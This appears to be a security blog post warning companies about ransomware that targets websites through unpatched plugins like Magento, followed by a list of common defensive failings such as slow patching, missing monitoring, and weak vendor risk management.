It might be a fair fight if companies would do just a few of the right things, but for a lot of them, they do not.
There is a form of ransomware going around now that attacks web sites rather than workstations. Encrypting all the data on your web site will probably make you willing to pay a bigger ransom than Joe’s PC in the marketing department. This particular attack doesn’t try to compromise the operating system; it goes after buggy plugins and addons that companies don’t seem to be able to patch. In this case, described by Brian Krebs in his blog, the ransomware writers are going after plugins. One they found is a shopping cart addon called Magento. There was a patch released in February of this year and the vulnerability was disclosed in April, but still many web sites haven’t installed the patch. PATCHING JUST THE OPERATING SYSTEM IS NOT ENOUGH – YOU HAVE TO PATCH EACH AND EVERY TOOL THAT YOU USE AND YOU HAVE TO DO IT QUICKLY.
For some ransomware victims, the problem is even bigger. Apparently the Power Worm ransomware has a bug in it so that even if you pay the ransom, the attacker is unable to decrypt your files.
Given that this is your web site, having it offline, even for hours (and if you don’t have good backups, then maybe for days or more) is likely a problem for your business.
Now back to how the hackers get in.
They use the unpatched vulnerabilities to hack your own company’s web site. Then they add a new page that looks like all of the other pages on your site. Finally, they phish your employees to get them to click on a link to a web page on your own company’s web site and poof, they are in. Once they control one machine, they escalate their permissions and propagate themselves all over your network. It can happen VERY quickly.
So, what mistakes do companies make?
- Underestimate the risk of unsecure web applications. This means that you have to have a security development life cycle, test your applications and apply patches, among other things.
- Lack of continuous monitoring. If you are not watching in real time what is going on in your network, you have made it pretty easy for the attackers. Testing your web site once or even twice a year is a guaranteed fail.
- Lack of a disaster recovery, business continuity and incident response plan. If you don’t plan for it and don’t test the plan, then when the kaka hits the rotating-air-movement-devices (aka when the sh*t hits the fan), you will be that proverbial deer in the headlight.
- If convenience or features that marketing wants always win out over security, then you give the hackers a free pass. That does not mean that security always wins, but you need to have a clear process for evaluating security issues and understanding what risks you are willing to accept and which ones you are not willing to.
- Not dealing with third party security issues. Whether it is vendor risk management (think the Target breach, Home Depot Breach or OPM breach) or third party software bugs (like the Magento bug described above), problems with a third party are your problems and if your contracts are not written correctly, you probably don’t even have any recourse to go after them for damages. Most software licenses say that they don’t warrant that their software works correctly – you use it at your own risk. If that software (or a third party vendor) lets a hacker in, good luck getting any money out of them.
So this is an opportunity to tighten things up and make it a little harder for the bad guys. Maybe they will go after some other company rather than yours.